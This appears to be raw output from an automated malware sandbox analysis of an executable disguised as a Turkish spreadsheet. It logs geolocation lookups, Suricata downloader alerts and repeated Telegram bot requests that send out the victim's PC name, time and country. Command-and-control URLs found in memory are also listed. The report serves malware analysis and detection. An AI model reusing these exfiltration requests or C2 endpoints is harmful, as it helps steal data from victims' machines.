                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2009/10/2024%20/%2013:20:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2008/10/2024%20/%2022:25:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2008/10/2024%20/%2019:29:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49738 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49729 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49776 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49746 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49754 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49769 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49770 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49771 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49755 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49722 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49785 -> 188.114.97.3:443
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49719 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49756 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2009/10/2024%20/%2013:20:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2008/10/2024%20/%2022:25:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2008/10/2024%20/%2019:29:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 08 Oct 2024 10:45:24 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 08 Oct 2024 10:45:29 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 08 Oct 2024 10:45:34 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4490658108.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4490634067.0000000000431000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4490634067.0000000000431000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: InstallUtil.exe, 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: InstallUtil.exe, 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
